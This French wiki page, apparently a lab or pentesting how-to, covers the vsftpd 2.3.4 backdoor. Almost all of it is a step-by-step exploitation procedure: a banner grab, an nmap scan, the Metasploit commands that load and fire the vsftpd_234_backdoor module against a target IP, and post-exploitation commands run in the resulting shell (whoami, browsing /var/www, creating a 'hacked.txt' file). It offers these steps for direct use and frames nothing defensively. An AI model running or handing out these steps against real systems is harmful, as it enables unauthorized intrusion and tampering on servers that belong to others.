Vsftp backdoor
Aller à la navigation
Aller à la recherche
| Fiche express | |
|---|---|
| Vulnérabilité | Backdoor vsftpd 2.3.4 |
| Module | exploit/unix/ftp/vsftpd_234_backdoor
|
| Port | 21/tcp (FTP) |
| Voir aussi | Unreal irc · Ubuntu metasploit |
La version 2.3.4 de vsftpd a été publiée avec une porte dérobée présente directement dans le paquet. Le module Metasploit correspondant déclenche ce backdoor sur le service FTP (port 21).
Connaître la version du service :
telnet 192.168.0.18 21
Procédure
msfconsole
nmap -sV -Pn -vv 192.168.23.25
search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
show options
set RHOST 192.168.23.25
set RPORT 21
exploit
Une fois le shell obtenu :
whoami
cd /var/www
ls
touch hacked.txt
Voir aussi
- Unreal irc — autre service distribué avec un backdoor
- Ubuntu metasploit — exploitation Samba sous Linux